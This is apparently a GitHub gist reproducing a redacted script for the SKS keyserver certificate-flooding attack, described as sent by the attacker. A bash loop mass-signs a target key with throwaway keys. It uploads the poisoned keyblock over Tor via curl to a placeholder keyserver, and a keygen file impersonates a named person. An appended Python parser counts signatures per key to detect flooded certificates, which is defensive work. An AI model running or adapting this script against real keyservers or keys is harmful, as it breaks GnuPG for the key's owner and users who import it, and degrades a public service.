lukateras/8d57c7892d4bcd50d11e69f71b1f80bf
Last active December 13, 2020 16:38
Redacted SKS exploit that was sent to me by the attacker behind https://news.ycombinator.com/item?id=20312826
for _ in {1..500}; do
  for _ in {1..100}; do
    gpg --gen-key --batch keygen
    gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
    rm ~/.gnupg/private-keys-v1.d/*.key
  done
  rm ~/.gnupg/openpgp-revocs.d/*.rev
  gpg -a --export > ~/Desktop/keyblock.asc
  rm ~/.gnupg/pub*
  rm ~/.gnupg/tofu.db
  rm ~/.gnupg/trustdb.gpg
  rm -r ~/.gnupg/openpgp-revocs.d
  rm -r ~/.gnupg/private-keys-v1.d
  mkdir ~/.gnupg/private-keys-v1.d
  gpg --import ~/Desktop/yt.asc
  curl \
    --socks5-hostname localhost:9050 \
    --data-urlencode "keytext@keyblock.asc" \
    --max-time 60 \
    example.com:11371/pks/add
  rm ~/Desktop/keyblock.asc
done

Key-Type: default
Subkey-Type: default
Name-Real: Marc Horowitz
Name-Comment: Yegor, you did a great SKS research job so far! Hope you are well! May the best team win! :-)
Name-Email: marc@mit.edu
Expire-Date: 0
%no-protection
%commit
It seems the main difficulty in this attack is preventing GnuPG from DoS'ing itself, so the home directory has to be purged frequently. Thanks for sharing this, it illustrates that no sophisticated tool like trollwot was necessary for the attack.
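
On the receiving side, the script above amounts to a keyblock in which one key carries a very large number of third-party signatures. The following is an added example, not part of the gist or of GnuPG or SKS, that counts signature packets per primary key in a binary keyblock (for instance the output of `gpg --dearmor`) so an oversized certificate can be rejected before import. The function names and the default threshold are assumptions.

```python
SIGNATURE, PUBLIC_KEY = 2, 6   # packet tags, RFC 4880 section 4.3

def _new_length(data, pos):    # -> (length, next_pos, is_partial_chunk)
    if pos >= len(data):
        raise ValueError("truncated length header")
    first = data[pos]
    if first < 192:
        return first, pos + 1, False
    if first < 224:
        low = int.from_bytes(data[pos + 1:pos + 2], "big")
        return ((first - 192) << 8) + low + 192, pos + 2, False
    if first == 255:
        return int.from_bytes(data[pos + 1:pos + 5], "big"), pos + 5, False
    return 1 << (first & 0x1F), pos + 1, True

def iter_tags(data):
    """Yield each packet's tag from a binary (dearmored) OpenPGP stream."""
    pos = 0
    while pos < len(data):
        hdr = data[pos]
        if not hdr & 0x80:
            raise ValueError(f"bad packet header at offset {pos}")
        pos += 1
        if hdr & 0x40:                       # new-format header
            tag, partial = hdr & 0x3F, True
            while partial:                   # partial chunks end with a final length
                length, pos, partial = _new_length(data, pos)
                pos += length
        else:                                # old-format header
            tag, width = (hdr >> 2) & 0x0F, 1 << (hdr & 0x03)
            if width == 8:                   # length type 3: runs to end of stream
                pos = len(data)
            else:
                pos += width + int.from_bytes(data[pos:pos + width], "big")
        if pos > len(data):
            raise ValueError("truncated packet")
        yield tag

def signature_counts(data):
    """Signature packets following each primary key, in stream order."""
    counts = []
    for tag in iter_tags(data):
        if tag == PUBLIC_KEY:
            counts.append(0)
        elif tag == SIGNATURE and counts:
            counts[-1] += 1
    return counts

def flooded_keys(data, limit=1000):  # limit: assumed local policy threshold
    return [i for i, n in enumerate(signature_counts(data)) if n > limit]
```

The count includes self-signatures and subkey binding signatures, so the threshold should leave room for those.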